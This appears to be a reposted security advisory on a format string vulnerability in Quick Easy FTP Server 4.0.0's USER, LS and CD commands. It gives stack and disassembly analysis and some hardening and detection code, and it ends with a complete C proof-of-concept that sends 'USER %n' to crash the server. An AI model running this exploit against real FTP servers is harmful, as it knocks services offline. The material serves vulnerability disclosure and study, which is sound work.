Quick Easy FTP Server 4.0.0 multiple-command format string vulnerability

Source: Internet
Author: User

Version: Quick Easy FTP Server 4.0.0 (other versions not tested)

Test environment: W2K SP4

Quick Easy FTP Server 4.0.0 uses the wsprintfA function unsafely for string operations, letting client-supplied data reach the format argument, which results in a format string vulnerability. The affected commands include LS, CD and USER. The USER command does not require a valid account.
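To make the defect and its fix concrete, here is an added portable C example (not code from the product or the advisory's author): the vulnerable pattern places the client's command line in the format argument, the hardened form passes it through a constant format so "%x%n" is logged as literal text, and a small scanner counts conversion directives in an inbound command so a log monitor can flag %n. The function names and the log prefix are constructed assumptions modelled on the record visible in the stack dump below.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Scan an untrusted FTP command line for printf-style conversions.
 * Returns the number of conversions; *writes receives how many are %n,
 * the only directive that writes memory. "%%" is a literal and not counted.
 * Constructed detection helper, not code from the server. */
static int scan_directives(const char *s, int *writes)
{
    int total = 0;
    *writes = 0;
    while (*s) {
        if (*s++ != '%') continue;
        if (*s == '%') { s++; continue; }           /* literal percent */
        while (*s && strchr("-+ #0", *s)) s++;      /* flags */
        while (*s && (isdigit((unsigned char)*s) || *s == '.' || *s == '*')) s++;
        while (*s && strchr("hlLqjzt", *s)) s++;    /* length modifiers */
        if (!*s) break;                             /* truncated directive */
        total++;
        if (*s == 'n') (*writes)++;
        s++;
    }
    return total;
}

int count_format_directives(const char *cmd) { int w; return scan_directives(cmd, &w); }
int count_write_directives(const char *cmd)  { int w; scan_directives(cmd, &w); return w; }

/* Vulnerable pattern (as in the advisory): the command is the format string,
 *   wsprintfA(out, cmd);            -> "%x" reads the stack, "%n" writes to it.
 * Hardened: a constant format; cmd is only an argument, so "%x%n" stays text. */
int build_log_line(char *out, size_t n, const char *prefix, const char *cmd)
{
    return snprintf(out, n, "%s\t%s", prefix, cmd);
}

/* Returns 1 when the hardened path keeps the directives as literal characters. */
int hardened_keeps_directives_literal(void)
{
    char line[256];
    /* constructed prefix modelled on the log record seen in the stack dump */
    build_log_line(line, sizeof line, "(000001)\t-(not logged in)\t(127.0.0.1)>", "USER %x%n");
    return strstr(line, "USER %x%n") != NULL;
}
```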

The following is a brief analysis:

Submitting the username: %x%n

The stack layout when the parameters are read is as follows:

0012FCC0 011652E8 ASCII "02/10/2011 22:33:20.296 (000001)",TAB,"-(not logged in)",TAB,"(127.0.0.1)>",TAB,"USER %x%n"
0012FCC4 01167670 -> %x
0012FCC8 01164F60 ASCII "(000001)",TAB,"-(not logged in)",TAB,"(127.0.0.1)>",TAB,"USER %x%n" -> %x
0012FCCC 0012FD88 -> %x
0012FCD0 004147B0 ftpserve.004147B0 -> %x
0012FCD4 312F3230 -> %n

0012FCC4 01167670 points to a virtual function table.
The following code is reached in a subsequent call:
00366f13 |. 8B06 | mov eax, dword ptr [esi]
00366f15 |. 8BCE | mov ecx, esi
00366f17 |. FF90 B0000000 | call dword ptr [eax+B0] -- eax is a controllable value here, namely the value written by %n.
However, %n writes the number of characters output so far, and with the directive this early in the format that count cannot be made large enough (it would have to reach at least the stack region), so this path cannot be used.

0012FCCC 0012FD88 -> %x: the saved EBP sits at this position, so the value written by %n becomes EBP when the stack frame is restored. The following code then crashes:

00450844 |. 8945 FC mov dword ptr [ebp-4], eax
00450847 |> 8B45 FC mov eax, dword ptr [ebp-4] -- program crash, access violation (ebp is very small at this point)
0045084A |. 5E pop esi
0045084B |. C9 leave
0045084C \. C2 0C00 retn 0C

Because the leave instruction is equivalent to:
mov esp, ebp
pop ebp   ; note: with respect to esp, pop is equivalent to add esp, 4

Similar to an off-by-one, the retn 0C might offer a chance to execute shellcode.

It turns out that the length of the submitted USER field value is limited to a very short string, so this pointer is generally unusable.


1. The submitted string itself is not present on the stack, so there is no address to choose from (strictly there is one, but a stack address cannot be reached through wsprintfA). There is no chance to select an address.
2. The SEH chain was examined, but it is far from the code that triggers the vulnerability and the number of characters available is far too small, so the chain nodes cannot be modified.
3. Placing shellcode in the thread is difficult and of no practical significance.

At my level, I can only achieve a DoS effect.

USER command vulnerability test code (DoS)

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

int SendPayload(char *lpHost, int intPort, char *lpPayload, int intSize);

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("Quick Easy FTP Server 4.0.0 USER command format string vulnerability (DoS) POC\r\n");
        printf("contact: ylbhz@hotmail.com\r\n");
        printf("C:\\> exp [ip address]\r\n");
        return 0;
    }
    char strHost[20] = {0};
    /* bounded copy so an over-long argument cannot overflow strHost */
    strncpy(strHost, argv[1], sizeof(strHost) - 1);
    /* %n is the write directive that makes the server fault */
    char lpBuf[] = "USER %n\r\n";

    SendPayload(strHost, 21, lpBuf, lstrlenA(lpBuf));

    return 0;
}

int SendPayload(char *lpHost, int intPort, char *lpPayload, int intSize)
{
    SOCKET sock;
    struct sockaddr_in client;
    WSADATA wsa;

    printf("[*] Init socket...\r\n");
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
    {
        printf("[-] WSAStartup Error!\r\n");
        return -1;
    }
    memset(&client, 0, sizeof(client));
    client.sin_addr.S_un.S_addr = inet_addr(lpHost);
    client.sin_family = AF_INET;
    client.sin_port = htons((u_short)intPort);
    /* inet_addr returns INADDR_NONE for an unparseable address */
    if (client.sin_addr.S_un.S_addr == INADDR_NONE)
    {
        printf("[-] socket_inaddr init error!\r\n");
        WSACleanup();
        return -1;
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        printf("[-] socket create error!\r\n");
        WSACleanup();
        return -1;
    }
    printf("[+] Socket Init success!\r\n");

    printf("[*] Connect the Server...\r\n");
    if (connect(sock, (struct sockaddr *)&client, sizeof(client)) == SOCKET_ERROR)
    {
        printf("[-] Connect Error!\r\n");
        closesocket(sock);
        WSACleanup();
        return -1;
    }
    printf("[+] Connect successful!\r\n");

    printf("[*] Send Payload!\r\n");
    int intLen = send(sock, lpPayload, intSize, 0);
    if (intLen <= 0) printf("[-] Send Payload Error!\r\n");
    else printf("Send %d bytes\r\n", intLen);
    /* read whatever reply arrives (or the closed connection) before exiting */
    char strBuf[1024] = {0};
    intLen = recv(sock, strBuf, sizeof(strBuf) - 1, 0);

    printf("[*] Close Socket!\r\n");
    closesocket(sock);
    WSACleanup();

    return 0;
}

From: painful belief
